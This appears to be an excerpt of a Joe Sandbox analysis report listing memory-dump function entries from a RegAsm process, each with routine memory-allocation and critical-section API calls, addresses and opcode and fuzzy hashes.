                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 514945f0099e71a1b6c5d2a19c7781b4b856f94f01ee2e730ddb138a9b7de064
                                                                            • Instruction ID: 78a44644e9a296e125ba38fd93488956ac760f5d61c2897166dde20c251322e3
                                                                            • Opcode Fuzzy Hash: 514945f0099e71a1b6c5d2a19c7781b4b856f94f01ee2e730ddb138a9b7de064
                                                                            • Instruction Fuzzy Hash: 44514A367016508FEF149AAAC49462673B1FBC2B34B25817ED865A7F80F732E84187E4
                                                                            APIs
                                                                            • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6CC6E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6CC95A47
                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6CC6E56A,?,|UrlbarCSSSpan), ref: 6CC95A5C
                                                                            • free.MOZGLUE(?), ref: 6CC95A97
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6CC95B9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$mallocmemset
                                                                            • String ID:
                                                                            • API String ID: 2682772760-0
                                                                            • Opcode ID: 1f0cd7bfb18409896c1bb4dacdd783245d3bac3c1d0fcd84d5427013d87bda5f
                                                                            • Instruction ID: da49d115dc4add6f80abea42ec90199b0fed30b5ddc2bee46991e0b7d608392c
                                                                            • Opcode Fuzzy Hash: 1f0cd7bfb18409896c1bb4dacdd783245d3bac3c1d0fcd84d5427013d87bda5f
                                                                            • Instruction Fuzzy Hash: 6E514F706087409FD701CF29C8C062AF7E5FF8A319F04CA6DE8899B646EB74D945CB66
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B628
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B67D
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC8B2C9,?,?,?,6CC8B127,?,?,?,?,?,?,?,?,?,6CC8AE52), ref: 6CC8B708
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC8B127,?,?,?,?,?,?,?,?), ref: 6CC8B74D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: c66a745af5927c0317225de55ecf81d470cf91db3572232835a7805d7c461940
                                                                            • Instruction ID: bbcee1d273a83f657d9933ef574e51e4c8dfb50bcfe507a3e12f772b2dac7e34
                                                                            • Opcode Fuzzy Hash: c66a745af5927c0317225de55ecf81d470cf91db3572232835a7805d7c461940
                                                                            • Instruction Fuzzy Hash: 9251CD71A067168BDF18CF58C9A066FBBB1FF45308F55852DD85AAB710EB31E804CBA1
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC7FF2A), ref: 6CC8DFFD
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E04A
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC7FF2A), ref: 6CC8E0C0
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC7FF2A), ref: 6CC8E0FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: 109519bfd85cd8d0a685649128bc63d06de12dfd4c816c85453c06ddbf1b9107
                                                                            • Instruction ID: 01a554ee563d53cbded722171d6f67002b4da27a42a3332fcc1752bbea3c1e37
                                                                            • Opcode Fuzzy Hash: 109519bfd85cd8d0a685649128bc63d06de12dfd4c816c85453c06ddbf1b9107
                                                                            • Instruction Fuzzy Hash: 5741AFB96062168BEB14CF68D88035B7BB6BB4630CF24493DD516DB740F732E906CB92
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CC961DD
                                                                            • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CC9622C
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC96250
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC96292
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$freememcpy
                                                                            • String ID:
                                                                            • API String ID: 4259248891-0
                                                                            • Opcode ID: 9208c1cfadfc6372149069bbe754d522fc33fedafc017f82a91c00f8340f5e44
                                                                            • Instruction ID: d30eeedc67ff11d667fea68e57b8c4c92937670672f09217949a2db96eb5b86d
                                                                            • Opcode Fuzzy Hash: 9208c1cfadfc6372149069bbe754d522fc33fedafc017f82a91c00f8340f5e44
                                                                            • Instruction Fuzzy Hash: 3B310671A00E0A8FDB04CF28D880AAA73F9FB95308F11453AD55AD7691FB31E598C791
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC86EAB
                                                                            • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC86EFA
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC86F1E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC86F5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$freememcpy
                                                                            • String ID:
                                                                            • API String ID: 4259248891-0
                                                                            • Opcode ID: 8993a7da8df1a7a4f61039b7f7d584e57bb3e96bec047d6851481120ae3c607d
                                                                            • Instruction ID: f92bda0adf23ef619728820f18ed3dfedfdd264b6541c3692d680f90dc29fac6
                                                                            • Opcode Fuzzy Hash: 8993a7da8df1a7a4f61039b7f7d584e57bb3e96bec047d6851481120ae3c607d
                                                                            • Instruction Fuzzy Hash: A831F471A21A0A8FDB04CF2CD941AAB77E9BB85308F504139D41AC7651FB31E55987A0
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B5EA
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B623
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B66C
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC40A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9B67F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$free
                                                                            • String ID:
                                                                            • API String ID: 1480856625-0
                                                                            • Opcode ID: 28155cc96a5ca25e9f0873547401c030d17c6c7a31407e9074f16611fd0ce82b
                                                                            • Instruction ID: 6f6460a7818f944e815297a6f9d8ae038752eea0be424160601919ecc5d8875f
                                                                            • Opcode Fuzzy Hash: 28155cc96a5ca25e9f0873547401c030d17c6c7a31407e9074f16611fd0ce82b
                                                                            • Instruction Fuzzy Hash: B2312771A002169FDB28CF59C85465ABBF5FF81304F16852AD806DB311EB31F915CBE0
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F611
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F623
                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC6F652
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC6F668
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                            • Instruction ID: 9062c10da60e88d4b4e8d0efcbe617984d9e0f302326ccdef4ce1be6516e5483
                                                                            • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                            • Instruction Fuzzy Hash: C5315E71A00214AFC714CF5ACDC4A9A77B5FB84354B14853DEA4A8BF04E632ED458B90
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744,6CC97765,00000000,6CC97765,?,6CC56112), ref: 6CC339AF
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744,?,6CC56112), ref: 6CC33A34
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784,6CC56112), ref: 6CC33A4B
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33A5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 39ee478e7cd308ffa62ddb97b0c77ad4dbdf837548ff45a894f413dba49c1d9f
                                                                            • Instruction ID: 0e70d531bc420b5a580e076ba3c5a5a98ab634a62042974d1965cb1e53c8b95e
                                                                            • Opcode Fuzzy Hash: 39ee478e7cd308ffa62ddb97b0c77ad4dbdf837548ff45a894f413dba49c1d9f
                                                                            • Instruction Fuzzy Hash: 262168367017118FCB149FE6D495A2673B1EF86B547280A1DD469A3F90FB31AC02C785
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4B96F
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6CC4B99A
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC4B9B0
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC4B9B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3313557100-0
                                                                            • Opcode ID: 967c321ebbbafde46be8047ff515d0d53ebfc995cd9cc7ee622f86fde4181937
                                                                            • Instruction ID: 76d5c866fef692e81fc026d244521d0da156360efe8846f830fb2aaf88c5fe92
                                                                            • Opcode Fuzzy Hash: 967c321ebbbafde46be8047ff515d0d53ebfc995cd9cc7ee622f86fde4181937
                                                                            • Instruction Fuzzy Hash: 75114FB1A002069FCB04DF69D8848AFB7F8BF98314B14853AE91AD3711E731A9158AA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 0936faf57fde408764e48ec1a9e0140e39618fff42944ceeebbc0395f2fbf2b6
                                                                            • Instruction ID: e82d43d1b88df88e19c19fe44e6bc361e2469cdf266f84fc3f60822f2c328e32
                                                                            • Opcode Fuzzy Hash: 0936faf57fde408764e48ec1a9e0140e39618fff42944ceeebbc0395f2fbf2b6
                                                                            • Instruction Fuzzy Hash: DDF0F9B27022005BEB009A58E88C947B7B9EF4121CB500035FA16C3B01F331F929C6A5